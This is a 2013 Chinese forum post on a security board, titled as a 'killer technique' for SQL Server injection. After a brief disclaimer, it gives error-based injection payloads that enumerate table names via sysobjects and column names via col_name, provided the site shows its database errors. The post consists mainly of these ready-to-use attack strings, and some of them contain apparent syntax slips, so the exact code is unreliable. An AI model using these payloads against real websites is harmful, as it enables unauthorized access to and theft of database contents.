找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
NB5牛论坛»首页 技术交流区 网安技术 SQLSERVER注入必殺技
返回列表 发新帖
查看: 755|回复: 0

SQLSERVER注入必殺技

[复制链接]
別の1種の生

29

主题

-4

回帖

117

牛毛

一级牛人

积分
117
发表于 2013-4-16 15:58:47 | 显示全部楼层 |阅读模式 来自 上海市
必殺技成功條件:
1.找到注入點
2.數據庫為SQLSERVER
3.IIS沒屏蔽錯誤提示

注:因必殺技是我研究N久的心得,經多次改良,成功率極高。請不要用於不合法用途上,否則後果自負。

[N] = 第N個表
ID=1 and (Select top 1 name from(Select top [N] idname from sysobjects where xtype=char(85)) T order by id desc)>1

[T] = 表名
[N] = 第N個字段
ID=1 and (Select Top 1 col_name(object_id([T])[N]) from sysobjects)>1

回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-27 21:54 , Processed in 0.205897 second(s), 33 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表